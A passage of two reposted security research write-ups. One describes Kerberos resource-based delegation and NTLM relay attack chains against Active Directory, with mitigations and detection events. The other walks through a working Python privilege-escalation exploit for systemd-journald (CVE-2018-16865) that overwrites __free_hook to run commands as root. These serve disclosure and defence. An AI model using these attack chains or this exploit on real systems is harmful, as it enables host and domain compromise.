in his blog post Not A Security Boundary: Breaking Forest Trusts, unconstrained delegation works across forest boundaries, making this attack effective across bidirectional forest trusts. When Accounts Collude - TrustedToAuthForDelegation Who? For years, Active Directory security experts have been telling us that if we must configure Kerberos delegation, constrained delegation is the way to go, and that we should use “Kerberos only” rather than “any authentication protocol” (as known as “protocol transition”). But perhaps the choice between “Kerberos only” and “Any authentication protocol” does not actually matter. We now know that we can abuse resource-based constrained delegation to get a forwardable TGS for arbitrary users. It follows that if we have credentials (or a TGT) for an account with an SPN and for an account with classic constrained delegation but without “protocol transition”, we can combine these two “features” to mimic “protocol transition”. This abuse case would work as follows: The attacker compromises an account that has an SPN or creates one (“Service A”). The attacker compromises an account (“Service B”), which is set for classic constrained delegation to a certain service class at Service C with Kerberos only (TrustedToAuthForDelegation is not set on Service B, and msDS-AllowedToDelegateTo on Service B contains a service on Service C, such as “time/Service C”). The attacker sets resource-based constrained delegation from Service A to Service B (setting msDS-AllowedToActOnBehalfOfOtherIdentity on Service B to contain “Service A” using Service B credentials or a TGT for Service B). The attacker uses Service A credentials/TGT to perform a full S4U2 attack and obtains a forwardable TGS for the victim to Service B. The attacker uses Service B credentials/TGT to invoke S4U2Proxy with the forwardable TGS from the previous step, and obtains a TGS for the victim to time/Service C. The attacker can modify the service class of the resulting TGS, for example from “time” to “cifs”, because the service name is not protected. The attacker can pass-the-ticket to gain access to Service C. The following diagram illustrates this scenario: Video demonstration of this scenario: https://youtu.be/y37Eo9zHib8 Unconstrained Domain Persistence Once attackers compromise the domain, they can obviously configure resource-based constrained delegation on strategic objects, such as domain controllers, and obtain a TGS on-demand. But resource-based constrained delegation can also be configured to generate TGTs on-demand as a domain persistence technique. Once the domain is compromised, resource-based constrained delegation can be configured from a compromised account to the krbtgt account to produce TGTs. The abuse case would work as follows: The attacker compromises the domain and an account that has an SPN or creates one (“Service A”). The attacker configures resource-based constrained delegation from Service A to krbtgt. The attacker uses Rubeus to perform a full S4U attack and obtain a TGS for an arbitrary user to krbtgt, which is, in fact, a TGT. The attacker can use the TGT to request a TGS to arbitrary services. The following diagram illustrates this scenario: Video demonstration of this scenario: https://youtu.be/1BU2BflUHxA In this scenario, the account Service A obtained a degree of power somewhat similar to that of the KDC in the sense that it can produce a TGT for arbitrary users. Arguably, more subtle persistence can be achieved through a new access control entry (ACE) to allow configuring resource-based constrained delegation on-demand, rather than leaving it in plain sight. Thinking Outisde the Box: RCE/LPE Opportunities As shown above, if an attacker can compromise a host with unconstrained delegation, RCE can be achieved with “the printer bug” and S4U2Self. But unconstrained delegation is not a trivial condition, so I attempted to come up with an attack chain that does not require unconstrained delegation. As mentioned above, every resource has the rights to configure resource-based constrained delegation for itself, which can be done via LDAP. This primitive opens the door to RCE/LPE opportunities if an attacker is in a position to perform a successful NTLM relay of a computer account authentication to LDAP. The abuse case would work as follows: The attacker compromises an account that has an SPN or creates one (“Service A”). The attacker triggers a computer account authentication using a primitive such as “the printer bug”. The attacker performs an NTLM relay of the computer account (“Service B”) authentication to LDAP on the domain controller. The attacker configures resource-based constrained delegation from Service A to Service B. The attacker uses Rubeus to perform a full S4U attack and obtain a TGS to Service B for a user that has local administrator rights on that host. The attacker can pass-the-ticket and gain RCE/LPE, depending on the primitive used to trigger the computer account authentication. The above scenario is straightforward and too good to be true. However, the reality is that NTLM relay is more complicated than it seems. NTLM Relay 101 NetNTLM is a challenge-response authentication protocol designed by Microsoft for Windows environments. In the NetNTLM protocol, three messages are exchanged: The client sends a NEGOTIATE message to request authentication and “advertise capabilities”. The server sends a CHALLENGE message that contains a random 8-byte nonce. The client sends an AUTHENTICATE message that contains a response to the challenge. The response is calculated using a cryptographic function with a key derived from the user’s password (the NTLM hash). The server validates the response to the challenge. If it is valid, authentication is successful. Otherwise, authentication fails. The protocol is susceptible to the following relay attack: An attacker in a man-in-the-middle position waits for an incoming NEGOTIATE message from a victim. The attacker relays the NEGOTIATE message to the target server. The target server sends a CHALLENGE message to the attacker. The attacker relays the CHALLENGE message to the victim. The victim generates a valid AUTHENTICATE message and sends it to the attacker. The attacker relays the valid AUTHENTICATE message to the target server. The target server accepts the AUTHENTICATE message and the attacker is authenticated successfully. The following diagram illustrates an NTLM relay attack: The NetNTLM protocol does not only provide authentication but can also facilitate a session key exchange for encryption (“sealing”) and signing. The client and the server negotiate whether sealing/signing is required through certain flags in the exchanged messages. The exchanged session key is RC4 encrypted using a key derived from the client’s NTLM hash. The client obviously holds the NTLM hash and can decrypt it. However, a domain member server does not hold the NTLM hash of domain users, but only of local users. When a domain user exchanges a session key with a member server, the member server uses the Netlogon RPC protocol to validate the client’s response to the challenge with a domain controller, and if a session key was exchanged then the key to decrypt it is calculated by the domain controller and provided to the member server. This separation of knowledge ensures that the member server does not obtain the NTLM hash of the client, and the domain controller does not obtain the session key. If the client and server negotiate a session key for signing, an attacker performing a relay attack can successfully authenticate, but will not be able to obtain the session key to sign subsequent messages, unless the attacker can obtain one of the following: The NTLM hash of the victim. Credentials for the computer account of the target server. Compromise a domain controller. However, if the attacker obtains any of the above, they do not need to perform an NTLM relay attack to compromise the target host or impersonate the victim, and this is the reason signing mitigates NTLM relay attacks. NTLM Relay 102 The goal is to perform a successful relay, without negotiating signing or encryption, from any protocol to LDAP. Most of the primitives I am aware of for eliciting a connection from a computer account are initiated by the SMB client or the RPC client, both of which always seem to negotiate signing. If signing was negotiated in the NTLM exchange, the LDAP service on domain controllers ignores all unsigned messages (tested on Windows Server 2016 and Windows Server 2012R2). The most obvious next move is to reset the flags that negotiate signing during the NTLM relay. However, Microsoft introduced a MIC (Message Integrity Code, I believe) to the NTLM protocol to prevent that. The MIC is sent by the client in the AUTHENTICATE message, and it protects the integrity of all three NTLM messages using HMAC-MD5 with the session key. If a single bit of the NTLM messages had been altered, the MIC would be invalid and authentication would fail. Not all clients support MIC, such as Windows XP/2003 and prior, and so it is not mandatory. So another thing to try would be omitting the MIC during the NTLM relay. However, there is a flag that indicates whether a MIC is present or not, and that flag is part of the “salt” used when calculating the NetNTLM response to the challenge. Therefore, if the MIC is removed and the corresponding flag is reset, then the NetNTLM response will be invalid and authentication will fail. Reflective NTLM Relay is Dead Traditionally, NTLM relay of computer accounts was performed reflectively, meaning from a certain host back to itself. Until MS08-068, it was commonly performed to achieve RCE by relaying from SMB to SMB. After it was patched, reflective cross-protocol NTLM relay was still possible, and was most commonly abused to achieve LPE in attacks such as Hot Potato. Cross-protocol reflective relay was patched in MS16-075, which killed reflective relays for good (or until James Forshaw brings it back). Rotten Potato/Juicy Potato is still alive and kicking, but it is a different flavour of reflective relay as it abuses local authentication, which ignores the challenge-response. Post MS16-075 many security researchers stopped hunting for primitives that elicit computer account authentication, because without reflection they were no longer valuable. Viable NTLM Relay Primitives for RCE/LPE An RCE/LPE primitive would require one of the following: A client that does not negotiate signing, such as the web client on all Windows versions, including WebDAV clients. A client that does not support MIC in NTLM messages, such as Windows XP/2003 and prior. An LDAP service that does not ignore unsigned messages or does not verify the MIC on a domain controller that supports resource-based constrained delegation. I don’t believe that this unicorn exists. There are different primitives for triggering the computer account to authenticate over HTTP. Some of them were abused in Hot Potato. I chose to explore those that take an arbitrary UNC path and then trigger a WebDAV client connection. Note that on Windows servers, the WebDAV client is not installed by default. On Windows Server 2012R2 and prior, the Desktop Experience feature is required, and on Windows Server 2016 or later, the WebDAV Redirector feature is required. However, on desktops, the WebDAV client is installed by default. As I mentioned above, it seems that some researchers no longer care for such primitives. However, as Lee Christensen (@tifkin_) demonstrated with the combination of “the printer bug” and unconstrained delegation, and as I will demonstrate below, these primitives are still exploitable, and I encourage everyone to keep hunting for them (and tell me all about it when you find them). Getting Intranet-Zoned By default, the web client will only authenticate automatically to hosts in the intranet zone, which means that no dots can be present in the hostname. If the relay server already has a suitable DNS record, then this is not an issue. However, if the relay server is “rogue”, an IP address will not cut it. To overcome that, ADIDNS can be abused to add a new DNS record for the relay server, as Kevin Robertson (@NetSPI) explained in his blog post Exploiting Active Directory-Integrated DNS. Case Study 1: MSSQL RCE/LPE MSSQL has an undocumented stored procedure called xp_dirtree that lists the file and folders of a provided path. By default, this stored procedure is accessible to all authenticated users (“Public”). Under the following conditions, an attacker can achieve RCE/LPE (depending mainly on connectivity) by abusing the xp_dirtree stored procedure: The the attacker has compromised a user permitted to invoke the xp_dirtree stored procedure. The MSSQL service is running as Network Service, Local System, or a Virtual Account (default). The WebDAV client is installed and running on the target host. The abuse case would work as follows: The attacker compromises credentials or a TGT for an account that has an SPN or creates one (“Service A”), and an account premitted to connect and invoke xp_dirtree on the target MSSQL instance. If required, the attacker uses Service A to add a DNS record using ADIDNS. The attacker logs in to the MSSQL service on the target host (“Service B”) and invokes xp_dirtree to trigger a connection to a rogue WebDAV NTLM relay server. The attacker relays the computer account NTLM authentication to the LDAP service on the domain controller, and configures resource-based constrained delegation from Service A to Service B. The attacker uses Rubeus to perform a full S4U attack to obtain a TGS to Service B for a user that has local administrator privileges on the target host. The attacker can pass-the-ticket to compromise the target host. The following diagram illustrates this scenario: Video demonstration of this scenario: https://youtu.be/nL2oa3URkCs Matt Bush (@3xocyte) implemented “Bad Sequel” as a PoC exploit for this scenario. Case Study 2: Windows 10/2016/2019 LPE One late night, Matt Bush (@3xocyte), Danyal Drew (@danyaldrew) and I brainstormed ideas where to find suitable RCE/LPE primitives, and decided to explore what happens when a user changes the account picture in Windows 10/2016/2019. We analysed it with Process Monitor and quickly found that during the account picture change SYSTEM opens the picture file to read its attributes. It is a small and meaningless operation; not an arbitrary file write/read/delete. But we are humble people, and that is all we wanted. The abuse case would work as follows: The attacker compromises credentials or a TGT for an account that has an SPN or creates one (“Service A”). The attacker gains unprivileged access to another computer running Windows 10 or Windows Server 2016/2019 with the WebDAV Redirector feature installed (“Service B”). If required, the attacker uses Service A to add a DNS record using ADIDNS. The attacker changes the account profile picture to a path on a rogue WebDAV NTLM relay server. The attacker relays the computer account NTLM authentication to the LDAP service on the domain controller, and configures resource-based constrained delegation from Service A to Service B. The attacker uses Rubeus to perform a full S4U attack to obtain a TGS to Service B for a user that has local administrator privileges on it. The attacker can pass-the-ticket to compromise Service B. The following diagram illustrates this scenario: Video demonstration of this scenario: https://youtu.be/741uz0ILxCA Mitigating Factors Accounts marked as sensitive for delegation or members of the Protected Users group are not affected by the attacks presented here, except for the S4U2Self abuse. However, computer accounts are affected, and in my experience they are never marked as sensitive for delegation or added to the Protected Users group. I did not thoroughly test the effects of setting computer accounts as sensitive for delegation or adding them to the Protected Users group, so I cannot recommend doing that, but I do recommend exploring it. As Lee Christensen (@tifkin_) demonstrated in “the printer bug” abuse case study at DerbyCon 8, obtaining a TGT/TGS for a domain controller allows performing “dcsync” and compromising the domain. As demonstrated above, with resource-based constrained delegation, obtaining a TGT for any computer account allows impersonating users to it and potentially compromising the host. Therefore, it is important not to configure any host for unconstrained delegation, because it can facilitate the compromise of other hosts within the forest and within other forests with bidirectional trust. LDAP signing with channel binding can mitigate the RCE and LPE attack chains described in the case studies above. The RCE/LPE attack chains that involve NTLM relay to LDAP abuse a default ACE that permits Self to write msDS-AllowedToActOnBehalfOfOtherIdentity. Adding a new ACE that denies Self from writing to the attribute msDS-AllowedToActOnBehalfOfOtherIdentity will interrupt these attack chains, which will then have to fall back to abusing that primitive in conjunction with unconstrained delegation. If your organisation does not use resource-based constrained delegation, you can consider adding an ACE that blocks Everyone from writing to the attribute msDS-AllowedToActOnBehalfOfOtherIdentity. Detection The following events can be used in the implementation of detection logic for the attacks describes in this post: S4U2Self: S4U2Self can be detected in a Kerberos service ticket request event (Event ID 4769), where the Account Information and Service Information sections point to the same account. S4U2Proxy: S4U2Proxy can be detected in a Kerberos service ticket request event (Event ID 4769), where the Transited Services attribute in the Additional Information is not blank. Unconstrained Domain Persistence: The domain persistence technique described above can be detected in a in a Kerberos service ticket request event (Event ID 4769), where the Transited Services attribute in the Additional Information is not blank (indicating S4U2Proxy), and the Service Information points to the “krbtgt” account. msDS-AllowedToActOnBehalfOfOtherIdentity: If an appropriate SACL is defined, then resource-based constrained delegation configuration changes can be detected in directory service object modification events (Event ID 5136), where the LDAP Display Name is “msDS-AllowedToActOnBehalfOfOtherIdentity”. Events where the subject identity and the object identity are the same may be an indicator for some of the attacks presented above. A Word of Advice from Microsoft Microsoft did highlight the risk of S4U2Proxy in section 5.1 of MS-SFU: “The S4U2proxy extension allows a service to obtain a service ticket to a second service on behalf of a user. When combined with S4U2self, this allows the first service to impersonate any user principal while accessing the second service. This gives any service allowed access to the S4U2proxy extension a degree of power similar to that of the KDC itself. This implies that each of the services allowed to invoke this extension have to be protected nearly as strongly as the KDC and the services are limited to those that the implementer knows to have correct behavior.” S4U2Proxy is a dangerous extension that should be restricted as much as possible. However, the introduction of resource-based constrained delegation allows any account to permit arbitrary accounts to invoke S4U2Proxy, by configuring “incoming” delegation to itself. So should we protect all accounts as strongly as the KDC? Author Elad Shamir (@elad_shamir) from The Missing Link Security. Acknowledgements Will Schroeder (@harmj0y), Lee Christensen (@tifkin_), Matt Bush (@3xocyte), and Danyal Drew (@danyaldrew) for bouncing off ideas and helping me figure this out. Will Schroeder (@harmj0y) for Rubeus. Matt Bush (@3xocyte) for dementor.py, helping implement the WebDAV NTLM relay server, and implementing Bad Sequel. Lee Christensen (@tifkin_) for discovering “the printer bug” and implementing SpoolSample. Benjamin Delpy (@gentilkiwi) for modifying Kekeo and Mimikatz to support this research. And OJ Reeves (@TheColonial) for the introduction. Kevin Robertson (@NetSPI) for Powermad. Microsoft for always coming up with great ideas, and never disappointing. Disclosure Timeline 26/10/2018 - Sent initial report to MSRC. 27/10/2018 - MSRC Case 48231 was opened and a case manager was assigned. 01/11/2018 - Sent an email to MSRC to let them know this behaviour actually conforms with the specification, but I believe it is still a security issue. 09/11/2018 - Sent an email to MSRC requesting an update on this case. 14/11/2018 - MSRC responded that they are still trying to replicate the issue. 27/11/2018 - Sent an email to MSRC providing a 60-day notice to public disclosure. 09/12/2018 - Send a reminder email to MSRC. 11/12/2018 - MSRC responded that a new case manager was assigned and the following conclusion was reached: “The engineering team has determined this is not an issue which will be addressed via a security update but rather we need to update our documentation to highlight service configuration best practices and using a number of features such as group managed service accounts, resource based constrained delegation, dynamic access control, authentication policies, and ensuring unconstrained delegation is not enabled. The team is actively working on the documentation right now with the goal of having it published prior to your disclosure date.” 28/01/2019 - Public disclosure I would like to note that my first experience with MSRC was very disappointing. The lack of dialogue was discouraging and not at all what I had expected. This post was also published on eladshamir.com. Sursa: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
-
Exploiting systemd-journald Part 1 January 29, 2019 By Nick Gregory Introduction This is part one in a multipart series on exploiting two vulnerabilities in systemd-journald, which were published by Qualys on January 9th. Specifically, the vulnerabilities were: a user-influenced size passed to alloca(), allowing manipulation of the stack pointer (CVE-2018-16865) a heap-based memory out-of-bounds read, yielding memory disclosure (CVE-2018-16866) The affected program, systemd-journald, is a system service that collects and stores logging data. The vulnerabilities discovered in this service allow for user-generated log data to manipulate memory such that they can take over systemd-journald, which runs as root. Exploitation of these vulnerabilities thus allow for privilege escalation to root on the target system. As Qualys did not provide exploit code, we developed a proof-of-concept exploit for our own testing and verification. There are some interesting aspects that were not covered by Qualys’ initial publication, such as how to communicate with the affected service to reach the vulnerable component, and how to control the computed hash value that is actually used to corrupt memory. We thought it was worth sharing the technical details for the community. As the first in our series on this topic, the objective of this post is to provide the reader with the ability to write a proof-of-concept capable of exploiting the service with Address Space Layout Randomization (ASLR) disabled. In the interest of not posting an unreadably-long blog, and also not handing sharp objects to script-kiddies before the community has had chance to patch, we are saving some elements for discussion in future posts in this series, including details on how to control the key computed hash value. We are also considering providing a full ASLR bypass, but are weighing whether we are lowering the bar too much for the kiddies (feel free to weigh in with opinions). As the focus of this post is on exploitation, the content is presented assuming the reader is already familiar with the initial publication’s analysis of the basic nature and mechanisms of the vulnerabilities involved. The target platform and architecture which we assume for this post is Ubuntu x86_64, and so to play along at home, we recommend using the 20180808.0.0 release of the ubuntu/bionic64 Vagrant image. Proof-of-Concept Attack Vector Before we can start exploiting a service, we need to understand how to communicate with it. In the case of journald, we could use the project’s own C library (excellently explained here). To ease exploitation, we need to have full control over the data sent to the target, a capability which unfortunately the journald libraries don’t provide out of the box. Thus, we chose to write our exploit in Python, implementing all the required functionality from scratch. To dive deeper into how our exploit works, we need to first understand how journald clients communicate to the daemon. So let’s get started! Interacting with systemd-journald There are three main ways userland applications can interact with journald: the syslog interface, the journald-native interface, and journald’s service stdout/stdin redirection. All of these interfaces have dedicated UNIX sockets in /run/systemd/journald/. For our purposes, we only need to investigate the syslog and native interfaces, as those attempt to parse the log messages sent by programs, and are where the vulnerabilities reside. Syslog Interface The syslog interface is the simplest interface to journald, being a compatibility layer for applications that aren’t built with journald-specific logging. This interface is available by writing to one of the standard syslog UNIX datagram sockets such as /dev/log or /run/systemd/journal/dev-log. Any syslog messages written into them are parsed by journald (to remove the standard date, hostname, etc. added by syslog, see manpage syslog(3)) and then saved. A simple way to experiment with the parser is by sending data with netcat, and observing the output with journalctl: $ echo 'Test Message!' | nc -Uu /dev/log $ journalctl --user -n 1 ... Jan 23 17:23:47 localhost nc[3646]: Test Message! Journald-Native Interface The native interface is how journal-aware applications log to the journal. Similar to the syslog interface, this is accessed by the UNIX datagram socket at /run/systemd/journal/socket.The journald-native interface uses a simple protocol for clients to talk to the journald server over this socket, resembling a simple Key/Value store, and which allows clients to send multiple newline-separated entries in a single write. These entries can either be simple KEY=VALUE pairs or binary blobs. Binary blobs are formed by sending the entry field name, a newline, the size of the blob as a uint64, the contents of the blob, and a final newline like so: SOME_KEY \x0a\x00\x00\x00\x00\x00\x00\x00\x00SOME_VALUE The native socket can also accept these entries in two different ways: by directly sending data over the socket by using an interesting feature of UNIX sockets, which is the ability to send a file descriptor (FD) over the socket Datagram sockets can only handle messages of a limited size (around 0x34000 bytes in our environment) before erroring with EMSGSIZE, and this is where FD passing comes in to play. We can write our messages to a temporary file, then pass journald a file descriptor for that file, giving us the ability to send messages up to journald’s self-imposed 768MB limit (defined by DATA_SIZE_MAX). Digging into FD passing a bit further, we find that journald can accept two different types of file descriptors: normal file descriptors (see manpages fcntl(2)) sealed memfds (see manpages memfd_create(2)) Luckily, we don’t need to bother with sealed file descriptors for reasons that we’ll get to in a future post. Similarly to the syscall interface, you can easily send native messages with nc: $ echo 'MESSAGE=Hello!' | nc -Uu /run/systemd/journal/socket $ journalctl --user -n 1 ... Jan 23 17:39:40 localhost nc[7154]: Hello! And to add custom entries: $ echo 'KEY=VALUE\nMESSAGE=Hello!' | nc -Uu /run/systemd/journal/socket $ journalctl --user -n 1 -o json-pretty { "__CURSOR" : "s=e07cdf6930884834bec282476c7b59e0;i=4e652;b=9a1272556aa440f69531842f94d8f10a;m=163757c8c8 "__REALTIME_TIMESTAMP" : "1548283220714394", "__MONOTONIC_TIMESTAMP" : "95417780424", ... "MESSAGE" : "Hello!", "KEY" : "VALUE", ... } Exploitation Overview Now that we have a decent understanding of how to interact with journald, we can start writing our exploit. Since the goal of this first post is to write a PoC which works with ASLR disabled, we don’t have to worry about using the syslog interface to perform a memory disclosure, and will instead jump directly into the fun of exploiting journald with CVE-2018-16865. As noted by Qualys, the user-influenced size allocated with alloca() is exploitable due to the ability to create a message with thousands, or even millions of entries. When these entries are appended to the journal, these messages result in a size of roughly sizeof(EntryItem) * n_entries to be allocated via alloca(). Since the mechanism of alloca() to reserve memory on the stack is a simple subtraction from the stack pointer with a sub rsp instruction, our influence over this size value grants the ability to lower the stack pointer off the bottom of the stack into libc. The actual use of alloca() in the source is wrapped in a macro called newa(), and the responsible code for the vulnerable operation looks like: items = newa(EntryItem, MAX(1u, n_iovec)); Our general approach for exploiting this vulnerability is to initially send the right size and count of entries, so as to make the stack pointer point to libc’s BSS memory region , and then surgically overwrite the free_hook function pointer with a pointer to system. This grants us arbitrary command execution upon the freeing of memory with content we control. To actually exploit this, there are two main issues we need to solve: Sending all of the entries to journald Controlling the data written to the stack after it has been lowered into libc The first issue has already been addressed by our exploration of the native interface, as discussed in the previous section. From this interface we can write data to a temporary file, and then pass the FD for that file to journald which gives us easily enough room to send the hundreds of megabytes of data needed to jump from the stack to libc. The second issue is a bit more complex, since we don’t directly control the data written to the stack after it has been lowered into libc’s memory. This is because our entries are being hashed prior to being written, by the function jenkins_hashlittle2 (originally written by Bob Jenkins, hence the name). Thus, exploitation requires controlling all 64 bits of output that the hash function produces, which presents a seemingly formidable problem at first. Preimaging a hash can be a daunting task; however, there are some very nice tools we can use to calculate exact preimages in under 30 seconds, since this is not a cryptographically secure hash. We’ll be exploring the specifics of achieving this calculation and the tools involved in our next blog post. For the scope of this post and our initial PoC, we will be using the constants we have already computed for our Vagrant image. Proof-of-Concept Code Here we will begin walking through Python code for our PoC, and a link to the full script can be found at the very end. The first chunk of code is basic setup, helper functions, and a nice wrapper around UNIX sockets that will make our life easier further down the line: #!/usr/bin/env python3 import array import os import socket import struct TEMPFILE = '/tmp/systemdown_temp' def p64(n): return struct.pack('<Q', n) class UNIXSocket(object): def __init__(self, path): self.path = path def __enter__(self): self.client = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM, 0) self.client.connect(self.path) return self.client def __exit__(self, exc_t, exc_v, traceback): self.client.close() Next we have some constants that may change based on the particular target environment. These constants were built for the 20180808.0.0 release of the ubuntu/bionic64 Vagrant image (and again, these assume a target with ASLR disabled): # Non-ASLR fixed locations for our test image libc = 0x7ffff79e4000 stack = 0x7fffffffde60 #location of the free_hook function pointer to overwrite free_hook = libc + 0x3ed8e8 # preimage which computes to location of the system function via hash64() # that location is libc + 0x4f440 in our test image system_preimage = b"Y=J~-Y',Wj(A" # padding count to align memory padding_kvs = 3 Now we have the bulk of the values needed for our proof-of-concept exploit. The first step in the exploit logic is to add some padding entries which causes an increase in the size of the alloca, shifting the stacks of journal_file_append_data (and the functions it calls) further down. This is to align the precise location where data will be written in libc’s .BSS, and avoid unnecessarily clobbering any other libc global values, which could greatly interfere with exploitation. with open(TEMPFILE, 'wb') as log: msg = b"" for _ in range(padding_kvs): msg += b"P=\n" Next, we add the preimage value, the hash for which (when computed from hash64()) will be the address of system. Specifically, this alignment of this value will be such that journald writes system into libc’s __free_hook, giving us a shell when our command below is freed. # msg n is our key that when hashed gives system msg += system_preimage + b"\n" Next, we append our command as a binary data block surrounded by semicolons to make sh happy. We also ensure journald is forcefully killed here so that libc has no chance of locking up after the system() call returns: # next is our command as a binary data block cmd = b"echo $(whoami) > /tmp/pwn" # be sure to kill journald afterwards so it doesn't lockup cmd = b";" + cmd + b";killall -9 /lib/systemd/systemd-journald;" # format as a binary data block msg += b"C\n" msg += p64(len(cmd)) msg += cmd + b"\n" As described by Qualys, we then send a large entry (>=128MB), which results in an error and causes journald to break out of the loop that is processing the entries (src). Once this error condition is hit and the loop is stopped, no more values are written, and so this step is important to discontinue the corrupting of memory, preventing values from being written to unmapped / non-writable memory between libc and the stack. # Then we send a large item which breaks the loop msg += b"A=" + b"B"*(128*1024*1024) + b"\n" Finally, we pad our message with enough entries to cause the stack->libc drop to happen in the first place: # Then fill with as many KVs as we need to get to the right addr num_msgs = (((stack - free_hook)//16) - 1) num_msgs -= 3 # the three above num_msgs -= 7 # added by journald itself msg += b"B=\n" * num_msgs log.write(msg) At this point, we just need to pass the log FD to journald to get our shell: with UNIXSocket("/run/systemd/journal/socket") as sock: with open(TEMPFILE, 'rb') as log: sock.sendmsg([b""], [(socket.SOL_SOCKET, socket.SCM_RIGHTS, array.array("i", [log.fileno()]))]) os.unlink(TEMPFILE) After running this, we find the file /tmp/pwn has been created with contents “root”, meaning we have successfully achieved our privilege escalation. $ cat /tmp/pwn root All Together Now The full proof-of-concept script that works with ASLR disabled is available here. Detection Having a working exploit for this (and other interesting) CVEs helps us validate our zero-day detection capabilities, and when necessary, improve them. Here, even with ASLR turned off, we detect exploitation out-of-the-box, as it is happening, through our Stack Pivot Strategy (we call our detection models strategies), and would generally detect most payloads. With ASLR turned on, an additional strategy detects the attempt to bypass ASLR. We do this all by looking for clear evidence of exploitation, instead of attempting to do signature scanning for IOCs associated with any specific CVE, malware family, threat actor, etc. While we can support that too, whack-a-mole isn’t a good model for detection and prevention. Sursa: https://capsule8.com/blog/exploiting-systemd-journald-part-1/